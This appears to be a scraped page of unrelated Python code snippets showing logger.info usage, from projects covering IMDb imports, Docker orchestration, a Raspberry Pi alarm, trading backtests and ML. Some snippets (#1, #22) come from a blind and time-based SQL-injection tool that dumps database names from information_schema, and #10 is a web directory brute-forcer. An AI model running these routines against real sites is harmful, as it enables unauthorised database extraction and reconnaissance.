Exemple #1
0
    def get_content_count(self, database_name, table_name):

        # 开始注内容
        logger.debug("Start sqli table %s content amount..." % table_name)

        logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest)

        if self.sqlimethod == "normal":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start table's %s content amount sqli..." % table_name)

            # 注数据的数量
            content_count = normal_injection(select="count(*)",
                                             source=database_name + "." + table_name,
                                             dealpayload=self.dealpayload,
                                             data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                             )
            logger.debug("Content account sqli success...The count is %d..." % content_count)

            # 把content account return回去
            logger.info("[*] content count: %d" % content_count)
            return content_count

        elif self.sqlimethod == "build":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start table's %s content amount sqli..." % table_name)

            retVal = build_injection(select="count(*)",
                                     source=database_name + "." + table_name,
                                     dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                     isCount=True, sqlirequest=self.sqlirequest)
            content_count = int(retVal)

            logger.debug("Content account sqli success...The content_count is %d..." % content_count)
            logger.info("[*] content_count: %d" % content_count)

            # 把content account return回去
            logger.info("[*] content count: %d" % content_count)
            return content_count

        elif self.sqlimethod == "time":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            logger.debug("Start table's %s content amount sqli..." % table_name)

            retVal = time_injection(select="count(*)",
                                    source=database_name + "." + table_name,
                                    dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                    isCount=True, sqlirequest=self.sqlirequest)
            content_count = int(retVal)

            logger.debug("Content account sqli success...The content_count is %d..." % content_count)
            logger.info("[*] content_count: %d" % content_count)

            # 把content account return回去
            logger.info("[*] content count: %d" % content_count)
            return content_count
Exemple #2
0
    def export2lmdb(self, lmdb_host, lmdb_dbname):
        """ 匯出IMDB資料庫的資料到LMDB

        :param lmdb_host:
        :param lmdb_dbname:
        :return:
        """

        logger.info('export to lmdb')

        since = 0
        i = 0

        while True:
            movies = self.DbOperator.get_movies_to_export_lmdb(since, limit=self.DbOperator.LIMIT)
            if movies:
                for movie in movies:
                    movieid = movie[0]
                    imdbid = 'tt%07d' % int(movie[1])
                    i += 1
                    try:
                        imdbmovie = self.IMDbObj.get_movie(imdbid, movieid)
                        imdbmovie.save2db(lmdb_host, lmdb_dbname)
                        logger.info(
                            '%d, %s, %s, %s, %s' % (i, movieid, imdbid, imdbmovie['url'], imdbmovie['posterurl'])
                        )
                    except Exception as e:
                        logger.error('save db error: %s \r\n %s' % (imdbid, str(e)))

                since += self.DbOperator.LIMIT
            else:
                break
Exemple #3
0
    def bootstrap(self):
        self.update_nodes()
        _updated = False
        for name, node in self.nodes.items():
            try: node.connect()
            except: pass
            if not node.exists or not node.name:
                L.info("Node not found, creating a new node")
                self.create_node(name, self.cfg)
                # Unset it so we really refresh it
                _updated = True
            node.cleanup_dead()
            L.ok("Node %s alive and ready!"%name)
        if _updated: self.update_nodes()

        played = []
        for s in self.base_services:
            played += self.play_service(self.nodes, s)

        if played:
            L.ok("Base services setup, cooling down while everything starts...")
            time.sleep(30)
        for s in self.dj_services + self.user_services:
            self.play_service(self.nodes, s)

        L.ok("Node setup OK!")
        return True
Exemple #4
0
def kill_containers(context):
    cfg = context.obj
    for manager in cfg['managers']:
        mgr = cfg['project'].manager_for(manager)
        for name, node in mgr.nodes.items():
            L.info('Stopping %d containers on node %s'%(len(node.containers),
                                                        name))
            node.stop_container()
Exemple #5
0
    def download_listfile(self):
        """ 下載IMDB的資料庫文字檔,http://www.imdb.com/interfaces

        :return:
        """
        logger.info('download listfile')
        self.Downloader.download()
        logger.info('download listfile is success!')
Exemple #6
0
def kill_services(context):
    cfg = context.obj
    for manager in cfg['managers']:
        mgr = cfg['project'].manager_for(manager)
        for s_name in mgr.user_services:
            for name, node in mgr.nodes.items():
                containers = node.running_services.get(s_name, [])
                L.info('Stopping %d containers running %s on node %s'%
                       (len(containers), s_name, name))
                for container in containers:
                    node.stop_container(id=container)
Exemple #7
0
def setDetection(new):
    if re.search("true", str(new)):
        status = True
        logger.info("DETECTION!")
    elif re.search("false", str(new)):
            status = False
            logger.info("DETECTION!")
    else:
        logger.warn("Invalid status %s for DETECTION" %(new))
        return
    global DETECTION
    DETECTION = status
Exemple #8
0
 def play_service(self, nodes, name):
     service = self.services[name]
     schedules = service.schedule(nodes)
     if len(schedules):
         L.info("Starting service %s %s times on %d nodes"%(
             name, len(schedules), len(nodes)))
         for node, schedule in schedules:
             self.play_by_schedule(node, schedule)
         L.ok("Service %s started OK"%name)
     else:
         L.ok("Service %s was running OK"%name)
     return schedules
Exemple #9
0
def setActive(new):
    #if(newStatus is False or newStatus is "False" or newStatus is "false" or newStatus is 0 or newStatus is "0"):
    if re.search("false", str(new)):
        status = False
        logger.info("Alarm deactivated")
    #elif(newStatus is True or newStatus is "True" or newStatus is "true" or newStatus is 1 or newStatus is "1"):
    elif re.search("true", str(new)):
        status = True
        logger.info("Alarm activated")
    else:
        logger.warn("Invalid status %s" %(new))
        return
    global active
    active = status
Exemple #10
0
def dir_bruter(word_queue, target_url, stime, extensions=None, pbar=None):

    while not word_queue.empty():

        pbar.update(1)
        
        attempt = word_queue.get()

        attempt_list = []

        # 检查是否有文件扩展名,如果没有就是我们要暴力破解的路径
        # if "." not in attempt:
        # 	attempt_list.append("%s/" % attempt)
        # else:
        attempt_list.append("%s" % attempt)

        # 如果我们想暴力扩展
        if extensions:
            for extension in extensions:
                if extension == ".swp":
                    attempt_list.append("/.%s%s" % (attempt.strip('/'), extension))
                else:
                    attempt_list.append("%s%s" % (attempt, extension))

        # 迭代我们想要尝试的文件列表
        for brute in attempt_list:

            url = "%s%s" % (target_url, urllib.quote(brute))
            # print url
            try:
                headers = {}
                headers["User-Agent"] = conf['ua']
                r = urllib2.Request(url, headers=headers)
                # pbar.update(1)
                try:
                    response = urllib2.urlopen(r, timeout=2)
                except:
                    logger.error("Time out...")
                    continue  # 有可能卡死

                # 请求完成后睡眠
                time.sleep(stime)

                if response.code != 404:
                    logger.info("Get !!!!" + url)
                    tqdm.write("[%d] => %s" % (response.code, url))

            except urllib2.URLError, e:
                if hasattr(e, 'code') and e.code != 404:
                    tqdm.write("!!! %d => %s" % (e.code, url))
Exemple #11
0
    def backup(self, dbname):
        logger.info('backup db')
        self.backupdb(dbname)
        logger.info('backup db is success!')

        logger.info('test backup db file')
        sys.stdout.flush()
        self.test_backupfile(dbname)
        logger.info('test backupfile is success!')

        self.move_backupfile(dbname)
Exemple #12
0
def serv_forever(sub_p, pub_p):
    context = zmq.Context()
    pub_s = context.socket(zmq.PUB)
    pub_s.bind('tcp://*:{PUB_PORT}'.format(PUB_PORT=pub_p))

    sub_s = context.socket(zmq.SUB)
    sub_s.setsockopt(zmq.SUBSCRIBE, '')
    sub_s.bind('tcp://*:{SUB_PORT}'.format(SUB_PORT=sub_p))

    poller.register(sub_s, zmq.POLLIN)

    socks = dict(poller.poll(360000))
    while 1:
        if socks:
            for sock, event in socks.iteritems():
                if sock is sub_s:
                    frame = sub_s.recv_multipart()
                    logger.info('MESSAGE:%s', frame)
                    pub_s.send_multipart(frame)
Exemple #13
0
 def create_node(self, name, cfg=None, options=None):
     if not cfg: cfg = {}
     if not options: options = {}
     else: cfg.update(options)
     options['provider'] = cfg.get('provider', {'name': 'local'})
     iaas = options['provider'].get('driver', 'virtualbox')
     services = options['services'] = options.get('services', [])
     L.info("Creating new machine %s on %s"%(name, iaas))
     swarm = cfg.get('swarm-token', '')
     extra = ' '.join(options['provider'].get('extra', []))
     if not len(self.running_nodes):
         swarm_extra = ' --swarm --swarm-master --swarm-discovery token://%s'%swarm
     else:
         swarm_extra = ' --swarm --swarm-discovery token://%s'%swarm
     command = "docker-machine create --driver %s %s %s"%(
         iaas, extra, name)
     output = call(command)
     L.ok("Done creating %s on %s!"%(name, iaas))
     self.update_nodes()
Exemple #14
0
 def run(self, *args, **kwargs):
     build = kwargs.pop('build', None)
     image = kwargs.get('image', None)
     if build:
         L.info("Building image %s on node %s"%(image, self.name))
         self.call_docker("build %s"%build)
     if image:
         tagged = ':' in image and image or '%s:latest'%image
         if not tagged in self.local_images():
             L.info("Can't find image %s, attempting to pull..."%image)
             self.call_docker("pull %s"%image)
         elif ':' in image and image.endswith('latest'):
             L.info("Image %s tagged 'latest', updating..."%image)
             try: self.call_docker("pull %s"%image)
             except: pass
         kwargs['image'] = image
     command_line = 'docker %s run %s %s'%(self.node_connect_str,
         image, kwargs.get('command','') or '')
     L.v("Using docker-py API to create container, you can run this --")
     L.v(command_line)
     dns = kwargs.pop('dns', None)
     dns_search = kwargs.pop('dns_search', None)
     privileged = kwargs.pop('privileged', '') == 'ceph' and 'ceph/' in image
     container = self.client.create_container(*args, **kwargs)
     return self.client.start(container, dns=dns, privileged=privileged), container
Exemple #15
0
    def update_movie_imdbid(self):
        """ 更新IMDB資料庫電影的IMDBID

        如果更新某部電影的IMDBID,出現錯誤連續達到10次,則不繼續嘗試更新IMDBID(可能會是網路等問題)

        :return:
        """

        logger.info('update imdb_id field')

        count = 0
        max_try = 10

        while True:
            movies = self.DbOperator.get_null_imdbid_movies()
            if len(movies) == 0:
                break

            for movie in movies:
                try_times = 0
                count += 1

                try:
                    logger.info('%s: %s' % (count, self.get_imdbid_result(movie[0])))
                except Exception:
                    try_times += 1
                    time.sleep(3)
                    if try_times == max_try:
                        logger.error(traceback.format_exc())
                        return

        logger.info('import db to table is success!')
Exemple #16
0
def main():
    # main

    # activate API
    if api.lunch():
        logger.info("API started")
    else:
        logger.error("API failed start")

    GPIO.setmode(GPIO.BOARD)
    pir = 26
    GPIO.setup(pir, GPIO.IN)
    logger.info("Application started")
    while True:
        while active.getActive():
            if GPIO.input(pir):
                time.sleep(1)
                if GPIO.input(pir):
                    active.setDetection("true")
                    sender.emailAlert()
                    active.setDetection("false")
                    time.sleep(0.2)
Exemple #17
0
    def _update_imdb_movies(self, getdata_func):
        """ 更新imdb電影資訊

        利用imdbpy去取得最新的電影資訊,然後更新資料庫

        :param getdata_func: 取得要更新的imdb電影
        :return:
        """
        i = 0
        since = 0
        while True:
            movies = getdata_func(limit=self.DbOperator.LIMIT, since=since)
            if movies:
                for movie in movies:
                    imdbid = movie[0]
                    try:
                        # 檢查是否正確的imdbid格式
                        if not re.match('tt\d{7}', imdbid):
                            raise Exception('not a valid imdbid')
                        if self.DbOperator.is_error_imdbid_movie(imdbid):
                            logger.info('error imdbid: %s' % imdbid)
                            continue
                        imdbmovie = self.IMDbObj.get_movie(imdbid)
                        imdbmovie.save2db(self.DbOperator.HOST, self.DbOperator.DB)
                        i += 1
                        logger.info(
                            (i, imdbid, imdbmovie['url'], imdbmovie['rating'], imdbmovie['posterurl']).__str__()
                        )
                    except Exception as e:
                        time.sleep(30)
                        # 如果imdb網路正常,卻取不到資訊,代表可能是錯誤的imdbid,所以要清除imdbid
                        if self.IMDbObj.is_network_ok():
                            self.DbOperator.clear_imdbid(imdbid)
                            logger.info('clear imdbid: %s' % imdbid)
                        else:
                            logger.warning('update imdb fail: %s' % (str(e)))
                            return

                since += self.DbOperator.LIMIT
                logger.info('exported count: %d' % i)
            else:
                break
Exemple #18
0
    def import_listfile(self):
        """ 將IMDB的資料庫文字檔匯進DB

        如果匯入時發生問題,則利用上次的備份檔進行還原

        :return:
        """
        logger.info('import listfile to db')

        try:
            self.make_csvdir()
            imdbpy2sql_path = os.path.normpath('%s/updateimdb/bin/' % DIR_CRONTAB)
            cmd = 'python %s/imdbpy2sql.py -d %s -u %s -c %s -i table' \
                  % (imdbpy2sql_path, self.Downloader.get_download_dir_path(), self.DbOperator.URI, self.get_csvdir())
            subprocess.check_call(cmd, shell=True)
        except Exception:
            logger.error('error occurred during import listfile to db, try to restore the older db')
            self.DbBackup.restoredb(self.DbOperator.DB, '%s/%s.bak' % (self.DbBackup.BACKUPDIR, self.DbOperator.DB))
            logger.info('restore success!')
            raise

        logger.info('import listfile to db is success!')
Exemple #19
0
    def play_by_schedule(self, node, schedule):
        s = schedule
        ip = s['ip']
        name = s['node']
        role = s.get('role', None)
        number = s.get('number', None)
        s['leader_ip'] = self.leader_ip

        s['container_name'] = container_name = s.get('container_name',
                    '%(service)s.%(node)s.%(domain)s')%(s)
        labels = {'service': s['service']}
        labels.update(s.get('labels',{}))
        ports = map(str, s.get('ports', []))
        dynamic = map(str, s.get('dynamic_ports', []))
        expose = []
        bind = {}
        for p in ports:
            if '/' in p:
                p, proto = p.split('/')
            else: proto = 'tcp'
            if ':' in p:
                h_p, c_p = map(int, p.split(':'))
            else:
                h_p = c_p = int(p)
            if proto in ['tcp', 'both']:
                expose.append(c_p)
                bind[c_p] = (node.ip, h_p)
            if proto in ['udp', 'both']:
                expose.append( (c_p, 'udp') )
                bind['%s/udp'%c_p] = (node.ip, h_p)
            L.info('Opening static port on %s:%s to %s'%(node.ip, h_p, c_p))
        for p in dynamic:
            if '/' in p:
                p, proto = p.split('/')
            else: proto = 'tcp'
            c_p = int(p)
            if proto in ['tcp', 'both']:
                expose.append(c_p)
                bind[c_p] = (node.ip, )
            if proto in ['udp', 'both']:
                expose.append( (c_p, 'udp') )
                bind['%s/udp'%c_p] = (node.ip, )
            L.info('Opening dynamic port on %s to %s'%(node.ip, c_p))
        node.cleanup_dead(name=container_name)
        if not node.is_running(name=container_name):
            build = s.get('build', None)
            image = build and s.get('service', '') or s.get('image', None)
            instance = node.run(
                name=container_name, hostname=container_name,
                image=image, build=build, ports=expose,
                command=s.get('command', '')%s,
                environment=[e%s for e in s.get('environment', [])],
                labels=labels,
                host_config = node.client.create_host_config(
                    binds=s.get('volumes', None),
                    port_bindings=bind,
                    dns=[self.leader_ip],
                    dns_search=[self.cfg.get('domain', None)],
                    network_mode=s.get('network', None),
                )
        )
        else:
            L.debug("Already running %s"%(container_name))
Exemple #20
0
    def trading_day(self, day):
        session = self.createSession()
        for symbol, strat in self.strategies.items():
            try:
                signal = strat.get_signal(day) #ToDo: Handle exceptions
            except Exception as e:
                logger.debug("Exception for {} at day {}: {}".format(symbol, day, e))
                continue
            session.add(signal) # Save signals to db for history
            # Get asset
            asset = self.exchange.get_or_create_asset(session, symbol)
            # Manage open positions
            longs = self.exchange.get_open_long(session, asset)
            for o in longs:
                if o.should_stop(signal.close):
                    logger.info('[Day: {}] Closing long position {} on {} due to stop loss'.format(day, o.id, o.symbol))
                    _, log = self.exchange.close_order(day, asset, o, o.stop_loss)
                    session.add(log)
                    continue

                # If signal is SELL or position has a 1% profit
                if signal.signal == SignalType.SELL:
                    logger.info(
                        '[Day: {}] Closing long position {} on {} due to SELL signal'.format(day, o.id, o.symbol))
                    _, log = self.exchange.close_order(day, asset, o, signal.close)
                    session.add(log)
                    continue
            shorts = self.exchange.get_open_short(session, asset)
            for o in shorts:
                # If close meets stop loss, close position
                if o.should_stop(signal.close):
                    logger.info(
                        '[Day: {}] Closing short position {} on {} due to stop loss'.format(day, o.id, o.symbol))
                    _, log = self.exchange.close_order(day, asset, o, o.stop_loss)
                    session.add(log)
                    continue
                # If signal is BUY we're going to lose money, so we close position
                if signal.signal == SignalType.BUY:
                    logger.info(
                        '[Day: {}] Closing short position {} on {} due to BUY signal'.format(day, o.id, o.symbol))
                    _, log = self.exchange.close_order(day, asset, o, signal.close)
                    session.add(log)
                    continue
                # If signal is HOLD and position is old
                if o.get_age_in_days(day) > 2 and signal == SignalType.HOLD:
                    logger.info('[Day: {}] Closing short position {} on {} due to age'.format(day, o.id, o.symbol))
                    _, log = self.exchange.close_order(day, asset, o, signal.close)
                    session.add(log)
                    continue
            ## Open new positions
            # Determine position sizing
            position_coins = asset.position_size(signal.close, self.order_size)
            # Open the order
            if signal.signal == SignalType.BUY:
                logger.info(
                    '[Day: {}] Opening long position on {} due to BUY signal [Close {}, Price {}, Coins {}]'.format(
                        day, symbol, signal.close, position_coins * signal.close, position_coins))
                o, log = self.exchange.open_order(day, OrderType.LONG, asset, position_coins, signal.close,
                                        stop_loss=-0.01)  # Stop loss is -1%
                if not o:
                    logger.error("LONG FAILED")
                else:
                    session.add(o)
                    session.add(log)
            elif signal.signal == SignalType.SELL:
                logger.info(
                    '[Day: {}] Opening short position on {} due to BUY signal [Close {}, Price {}, Coins {}]'.format(
                        day, symbol, signal.close, position_coins * signal.close, position_coins))
                o, log = self.exchange.open_order(day, OrderType.SHORT, asset, position_coins, signal.close,
                                        stop_loss=0.01)  # Stop loss is +1%
                if not o:
                    logger.error("SHORT FAILED")
                else:
                    session.add(o)
                    session.add(log)
            session.add(Equity(
                day=day,
                symbol=symbol,
                equity=asset.equity(signal.close),
                longs=asset.long_orders,
                shorts=asset.short_orders
            ))
            session.commit()
Exemple #21
0
def build_model(dataset,
                pipeline,
                experiment,
                current_target='class',
                test_size=0.3):
    models_dir = './results/{}_{}_{}/models/'.format(dataset, pipeline,
                                                     experiment)
    reports_dir = './results/{}_{}_{}/reports/'.format(dataset, pipeline,
                                                       experiment)
    experiment_index_file = './results/{}_{}_{}/index.json'.format(
        dataset, pipeline, experiment)
    log_file = './results/{}_{}_{}/model_build.log'.format(
        dataset, pipeline, experiment)

    scoring = make_scorer(precision_score, zero_division=1, average='micro')
    os.makedirs(models_dir, exist_ok=True)
    os.makedirs(reports_dir, exist_ok=True)
    # Setup logging
    logger.setup(filename=log_file,
                 filemode='w',
                 root_level=logging.DEBUG,
                 log_level=logging.DEBUG,
                 logger='build_model')
    index_name = 'index'
    if '.' in dataset:
        splits = dataset.split(".")
        dataset = splits[0]
        index_name = splits[1]
    # Load the dataset index
    dataset_index = load_dataset(dataset,
                                 return_index=True,
                                 index_name=index_name)
    # Dynamically import the pipeline we want to use for building the model
    logger.info('Start experiment: {} using {} on {} with target {}'.format(
        experiment, pipeline, dataset, current_target))
    reports = ReportCollection(dataset, pipeline, experiment)
    for _sym, data in {'BTC': dataset_index['BTC']}.items():
        try:
            logger.info('Start processing: {}'.format(_sym))
            features = pd.read_csv(data['csv'],
                                   sep=',',
                                   encoding='utf-8',
                                   index_col='Date',
                                   parse_dates=True)
            targets = pd.read_csv(data['target_csv'],
                                  sep=',',
                                  encoding='utf-8',
                                  index_col='Date',
                                  parse_dates=True)

            # Drop columns whose values are all NaN, as well as rows with ANY nan value, then
            # replace infinity values with nan so that they can later be imputed to a finite value
            features = features.dropna(
                axis='columns', how='all').dropna().replace([np.inf, -np.inf],
                                                            np.nan)
            target = targets.loc[features.index][current_target]

            #X_train, X_test, y_train, y_test = train_test_split(features, target, shuffle=False, test_size=test_size)

            all_size = features.shape[0]
            train_size = int(all_size * (1 - test_size))
            features = detabularise(
                features[[c for c in features.columns if 'close' in c]])
            X_train = features.iloc[0:train_size]
            y_train = target.iloc[0:train_size]
            X_test = features.iloc[train_size:all_size]
            y_test = target.iloc[train_size:all_size]
            # Summarize distribution
            logger.info("Start Grid search")
            clf = ShapeletTransformClassifier(time_contract_in_mins=5)
            clf.fit(X_train, y_train)
            print('{} Score: {}'.format(_sym, clf.score(X_test, y_test)))
            pred = clf.predict(X_test)
            print(classification_report(y_test, pred))
            logger.info("End Grid search")

            logger.info("--- {} end ---".format(_sym))
        except Exception as e:
            logger.error(
                "Exception while building model pipeline: {} dataset: {} symbol: {}\nException:\n{}"
                .format(pipeline, dataset, _sym, e))
            traceback.print_exc()
    return reports
Exemple #22
0
    def get_database(self):

        logger.debug("The sqlirequest is %s, start sqli databases..." % self.sqlirequest)

        if self.sqlimethod == "normal":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start database amount sqli...")
            # 先注databases的数量

            databases_number = normal_injection(select='COUNT(`SCHEMA_NAME`)',
                                                source='information_schema.SCHEMATA',
                                                dealpayload=self.dealpayload,
                                                data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                                )

            logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
            print "[*] databases_number: %d" % databases_number

            # 每个循环跑一次databases的数据
            for i in trange(int(databases_number), desc="Database sqli...", leave=False, disable=True):
                # 首先是database name的长度
                logger.debug("Start %dth database length sqli..." % (i + 1))

                databases_name_len = normal_injection(select='length(`SCHEMA_NAME`)',
                                                      source='information_schema.SCHEMATA',
                                                      limit=i,
                                                      dealpayload=self.dealpayload,
                                                      data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                                      )

                logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
                logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))

                # 然后注database name
                logger.debug("Start %dth database name sqli..." % (i + 1))

                databases_name = normal_injection(select='`SCHEMA_NAME`',
                                                  source='information_schema.SCHEMATA', limit=i,
                                                  dealpayload=self.dealpayload,
                                                  data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                                  )

                logger.debug(
                    "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))

                # 把databases_name 中不是information_schema插入列表
                if databases_name != "information_schema":
                    self.databases_name.append(databases_name)
                logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))

        elif self.sqlimethod == "build":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start database amount sqli...")

            retVal = build_injection(select="COUNT(`SCHEMA_NAME`)",
                                     source="information_schema.SCHEMATA",
                                     dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                     isCount=True, sqlirequest=self.sqlirequest)
            databases_number = int(retVal)

            logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
            logger.info("[*] databases_number: %d" % databases_number)

            for i in range(0, int(databases_number)):

                logger.debug("Start %dth database length sqli..." % (i + 1))
                # 然后注databases_name 的 length

                retVal = build_injection(select="length(`SCHEMA_NAME`)",
                                         source="information_schema.SCHEMATA",
                                         limit=i,
                                         dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                         isCount=True, sqlirequest=self.sqlirequest)
                databases_name_len = int(retVal)

                logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
                logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))

                # 然后注databases名字
                # 清空database_name
                databases_name = ""
                logger.debug("Start %dth database sqli..." % (i + 1))
                for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False):

                    retVal = build_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))",
                                             source="information_schema.SCHEMATA",
                                             limit=i,
                                             dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                             isStrings=True, sqlirequest=self.sqlirequest)
                    databases_name += chr(retVal)

                logger.debug(
                    "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))

                # 把databases_name 中不是information_schema插入列表
                if databases_name != "information_schema":
                    self.databases_name.append(databases_name)

                logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))

        elif self.sqlimethod == "time":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start database amount sqli...")

            retVal = time_injection(select="COUNT(`SCHEMA_NAME`)",
                                    source="information_schema.SCHEMATA",
                                    dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                    isCount=True, sqlirequest=self.sqlirequest)
            databases_number = int(retVal)

            logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
            logger.info("[*] databases_number: %d" % databases_number)

            for i in range(0, int(databases_number)):
                logger.debug("Start %dth database length sqli..." % (i + 1))

                # 然后注databases_name 的 length

                retVal = time_injection(select="length(`SCHEMA_NAME`)",
                                        source="information_schema.SCHEMATA",
                                        limit=i,
                                        dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                        isCount=True, sqlirequest=self.sqlirequest)
                databases_name_len = int(retVal)

                logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
                logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))

                # 然后注databases名字
                # 清空databases_name
                databases_name = ""
                logger.debug("Start %dth database sqli..." % (i + 1))

                for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False):
                    retVal = time_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))",
                                            source="information_schema.SCHEMATA",
                                            limit=i,
                                            dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                            isStrings=True, sqlirequest=self.sqlirequest)
                    databases_name += chr(retVal)

                logger.debug(
                    "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))

                # 把databases_name 中不是information_schema插入列表
                if databases_name != "information_schema":
                    self.databases_name.append(databases_name)

                logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))

        databases_name = ','.join(self.databases_name)
        print "[*] databases_name list: " + databases_name
Exemple #23
0
from threading import Thread
from time import sleep
from lib.log import logger

logger.info("Loading library: {0}".format(__name__))

pins = {"1": 10, "2": 9, "3": 11, "4": 22}
OUT = 1
IN = 2

interrupt = None


def setup(gpio_pin, in_out):
    pass


def output(gpio_pin, high_low):
    for v in pins:
        if pins[v] == gpio_pin:
            logger.debug("Relay[{0}] is {1}".format(
                v, "HIGH" if high_low else "LOW"))


def main():
    output(11, True)
    output(9, False)


def add_interrupt_callback(gpio_pin, func, **kwargs):
    global interrupt
Exemple #24
0
 def run(self): # define this function,use for threading, define here or define in child-class both should be OK
     self.process()
     self.d = self.get_hostnames()
     self.e = self.get_emails()
     logger.info("{0} found {1} domain(s) and {2} email(s)".format(self.engine_name,len(self.d),len(self.e)))
     return self.d, self.e
Exemple #25
0
def main():
    result = {}
    for _sym in SYMBOLS:
        dataset = 'data/result/datasets/csv/{}.csv'.format(_sym)
        df = pd.read_csv(dataset,
                         sep=',',
                         encoding='utf-8',
                         index_col='Date',
                         parse_dates=True)
        df = df.replace([np.inf, -np.inf], np.nan).dropna()
        X = df[df.columns.difference(['target', 'target_pct', 'target_label'])]
        y = df['target']
        #print("======"+_sym+"======")
        #print(X.info())

        # Variance Threshold
        sel = VarianceThreshold()
        sel.fit_transform(X)
        sup = sel.get_support()
        X = X[[name for flag, name in zip(sup, X.columns) if flag]]
        ## SelectKBest
        sel = SelectKBest(chi2, k=30)
        sX = scale(X, scaler='minmax')
        sel.fit_transform(sX, y)
        sup = sel.get_support()
        sX = sX[[name for flag, name in zip(sup, sX.columns) if flag]]

        ## Recursive Feature Elimination
        # Create the RFE object and compute a cross-validated score.
        # The "accuracy" scoring is proportional to the number of correct
        # classifications
        # model = SVC(kernel="linear")
        # rfecv = RFECV(estimator=model, step=1, cv=StratifiedKFold(2), scoring='accuracy', n_jobs=-1, verbose=1)
        # rfecv.fit(X, y)
        # X = X[[name for flag, name in zip(rfecv.support_, X.columns) if flag]]
        ### Genetic
        # estimator = MLPClassifier(**{
        #     'hidden_layer_sizes': (10, 4),
        #     'solver': 'lbfgs',
        #     'learning_rate': 'constant',
        #     'learning_rate_init': 0.001,
        #     'activation': 'logistic'
        # })
        estimator = LogisticRegression(solver="liblinear", multi_class="ovr")
        gscv = GeneticSelectionCV(estimator,
                                  cv=2,
                                  verbose=1,
                                  scoring="accuracy",
                                  max_features=30,
                                  n_population=50,
                                  crossover_proba=0.5,
                                  mutation_proba=0.2,
                                  n_generations=80,
                                  crossover_independent_proba=0.5,
                                  mutation_independent_proba=0.05,
                                  tournament_size=3,
                                  n_gen_no_change=10,
                                  caching=True,
                                  n_jobs=-1)
        gscv = gscv.fit(X, y)
        X = X[[name for flag, name in zip(gscv.support_, X.columns) if flag]]

        #print(X.columns)

        # print("[%s] Optimal number of features : %d Set: %s" % (_sym, rfecv.n_features_, ', '.join(X.columns)))
        # plt.figure()
        # plt.title(_sym + ' SVC RFECV K=2')
        # plt.xlabel("Number of features selected")
        # plt.ylabel("Cross validation score (nb of correct classifications)")
        # plt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_)
        # plt.show()

        logger.info("{}: {}".format(_sym, X.columns))
        result[_sym] = {
            'dataset': dataset,
            'columns_genetic_lr_30': [c for c in X.columns],
            'columns_kbest_30': [c for c in sX.columns]
        }
    return result
    # open final report file
    with open(csv_filename, 'w') as csvwrite:
        # set field names
        fieldnames = ['IP Address', 'Port/Protocol', 'Domains', 'Operating System', 'OS Version', 'Notes']
        writer = csv.DictWriter(csvwrite, fieldnames=fieldnames, dialect=csv.excel, quoting=csv.QUOTE_ALL)
        
        # write CSV header
        writer.writeheader()

        # iterate through xml(s)
        for xml_report in nmap_xml_reports:
            try:
                # trying to load xml file
                nmap_report = NmapParser.parse_fromfile(xml_report)
                logger.info("%s host(s) loaded from %s" % (len(nmap_report.hosts), xml_report))
            except Exception, e:
                logger.warn("XML file %s corrupted or format not recognized" % xml_report)
                # keep looking for others xml
                continue

            # start a cumulative dictionary
            results = nmap_combine(nmap_report, results)
            #print "results: %s" % len(results)

        logger.info("Wraping up results")
        for ip_address in results:
            # colecting info for each field
            open_ports = check_ports(results[ip_address]['Port/Protocol'])
            hostnames = list_to_str(results[ip_address]['Domains'])
            notes = results[ip_address]['Notes']
Exemple #27
0
    pub_s = context.socket(zmq.PUB)
    pub_s.bind('tcp://*:{PUB_PORT}'.format(PUB_PORT=pub_p))

    sub_s = context.socket(zmq.SUB)
    sub_s.setsockopt(zmq.SUBSCRIBE, '')
    sub_s.bind('tcp://*:{SUB_PORT}'.format(SUB_PORT=sub_p))

    poller.register(sub_s, zmq.POLLIN)

    socks = dict(poller.poll(360000))
    while 1:
        if socks:
            for sock, event in socks.iteritems():
                if sock is sub_s:
                    frame = sub_s.recv_multipart()
                    logger.info('MESSAGE:%s', frame)
                    pub_s.send_multipart(frame)


if __name__ == '__main__':
    sub_p = 9021
    pub_p = 9022
    opts, argvs = getopt.getopt(sys.argv[1:], "s:p:")
    for op, value in opts:
        if op == '-s':
            sub_p = int(value)
        if op == '-p':
